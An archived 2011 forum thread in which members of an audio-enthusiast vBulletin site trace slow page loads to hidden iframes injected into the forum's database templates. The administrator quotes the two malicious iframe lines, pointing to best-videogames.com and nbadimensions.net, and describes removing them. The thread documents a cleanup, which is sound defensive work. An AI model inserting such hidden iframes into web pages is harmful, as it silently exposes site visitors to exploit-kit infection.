PDA

View Full Version : What is best-videogames.com?



JeffW
10-27-2011, 11:29 AM
This url is embedded in the source code of this site, and it's slowing the page load.


http://best-videogames.com/forum/ind.php

Line 58.

</head>


<body>







<div class="above_body"> <!-- closing tag is in template navbar -->



<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>



<div id="header" class="floatcontainer doc_header">







<div><a name="top" href="index.php" class="logo-image"><img src="images/LH-logo.gif" alt="Lansing Heritage Forums - Powered by vBulletin" /></a></div>



<div id="toplinks" class="toplinks">

Don C
10-27-2011, 11:35 AM
I noticed it too. A quick google informs us that the vbulletin code here has been hijacked and modified to generate page views for some jerk scammer. I don't think that it has anything do do with our computers at this point, just the server that runs the forum software.

1audiohack
10-27-2011, 04:28 PM
What ever it is can it be removed? It makes browsing this site on the old iPhone almost intolerable.

hjames
10-27-2011, 06:06 PM
What ever it is can it be removed? It makes browsing this site on the old iPhone almost intolerable.

Sure - its just code - Seems to be a dynamic site, so the bad code can be removed without much grief ...
once the webmaster finds the free time to poke into the code and remove it.

The bigger questions is - what do they need to do to harden the site so it doesn't happen again. Kiddie hackers (amateurs) leave foot prints like that - serious hackers load vulnerabilities and don't leave signposts to let you know you've been compromised.

Earl K
10-29-2011, 04:38 PM
"nbadimensions.net/sti.ph" is also loading along with (or piggybacking after ) the regular url loads, www.audioheritage.org/vbulletin (http://www.audioheritage.org/vbulletin) > according to my task bar .

:eek:

Earl K
10-30-2011, 05:25 AM
According to my research; the "Best-Videogames.com" is a wrapper of sorts that's run by > "Exploit Blackhole Exploit Kit(type 2065)" (http://malwareint.blogspot.com/2010/09/black-hole-exploits-kit-another.html)on this site .

It seems that browsers running AVG are being warned ( AGAINST ACCESSING THIS SITE ) since this web-site ( LHF ) is still infected .

<> :crying:

Earl K
10-30-2011, 11:12 AM
Here is what is being loaded according to my browser ( in order , I believe ) .

:confused:

Mr. Widget
10-30-2011, 02:26 PM
Funny... I saw the title of the thread and thought it was one more topic I have no interest in, being an avid non-gamer since the dawn of video games.

I'll send a note to Ann and John who take care of our hosting and see if they have the time to deal with it.

Thanks Earl for shooting the note to the moderators.


Widget

Don McRitchie
10-30-2011, 02:52 PM
Hopefully John or Ann can weigh in on this shortly. There is a more recent version of the forum software that I can update to, but I don't want to do this before knowing whether this would overwrite the infection. Otherwise, it could make matters worse.

JeffW
10-30-2011, 04:25 PM
Funny... I saw the title of the thread and thought it was one more topic I have no interest in, being an avid non-gamer since the dawn of video games.

I'll send a note to Ann and John who take care of our hosting and see if they have the time to deal with it.

Thanks Earl for shooting the note to the moderators.


Widget

I have no interest in video games, and it would have never occured to me to inquire about video games in the "Forum Feedback" forum of this site.

Had I known the moderators didn't actually read this forum, I wouldn't have bothered posting it in the first place.

Mr. Widget
10-30-2011, 04:43 PM
I have no interest in video games, and it would have never occured to me to inquire about video games in the "Forum Feedback" forum of this site.

Had I known the moderators didn't actually read this forum, I wouldn't have bothered posting it in the first place.Ouch! :)

Others probably did read it, but a different title would have likely captured my attention. I for one simply don't have the time to read every thread... much less every post.

As it turned out, a click on the "Report Post" button is what called my attention to it. In any event, thanks for bringing it to our attention.


Widget

cantelow
10-31-2011, 06:51 AM
Thanks for the head's up. I'll try to get rid of that today! :spchless:

Best,
Ann

cantelow
10-31-2011, 10:19 AM
That was an interesting problem. :) Thanks, everyone for the info.

I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:


<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>


to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

Happily, clearing the malicious links in just these 2 template records clears them out of the whole site. :)

Ann

JeffW
10-31-2011, 10:30 AM
Thanks, I can tell a difference already.

Earl K
10-31-2011, 10:40 AM
Thanks Ann

This site loads cleanly now .

:)

Mr. Widget
10-31-2011, 10:48 AM
Thanks Ann. You're the best!


Widget

Don McRitchie
10-31-2011, 11:49 AM
That was an interesting problem. :) Thanks, everyone for the info.

I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:


<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>


to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

Happily, clearing the malicious links in just these 2 template records clears them out of the whole site. :)

Ann

I'll try and get the forum software updated to the latest version within the next 48 hrs as I suspect that is where the exploit originated to allow access to modify the templates in the mysql database.

Altec Best
11-01-2011, 06:09 AM
That was an interesting problem. :) Thanks, everyone for the info.

I found that these links were embedded in our mysql database templates. I used the mysql replace function to replace these:


<div style="display:none"><iframe src="http://best-videogames.com/forum/ind.php" width="1" height="1"></iframe></div>

<div style="display:none"><iframe src="http://nbadimensions.net/sti.php" width="1" height="1"></iframe></div>


to nothing in 2 template records where they had crept in. I found that the vbulletin php files don't have these links in them, so besides the possibility that the code misses doing some mysql hack detection somewhere (?), I believe those files are fine and clean.

I looked for other such links, didn't see any at this point. It took a little fussing to figure out how to fix it the first time, but I'll be able to fix any more that pop up easily now. Feel free to point them out, and I can jump in there to clear them.

Happily, clearing the malicious links in just these 2 template records clears them out of the whole site. :)

Ann

I too would like to Thank You Ann, for fixing it quickly.It's reassuring to know you good Folk's are on the ball ! :applaud:




This site loads cleanly now .


Yes it does.Thank You too Earl for the Info & Links !:applaud:

Much Appreciated ! ;)

Titanium Dome
11-01-2011, 09:05 AM
Thanks, Ann.

JuniorJBL
11-04-2011, 06:33 AM
Thanks to our Host's here in the rockies!!:applaud: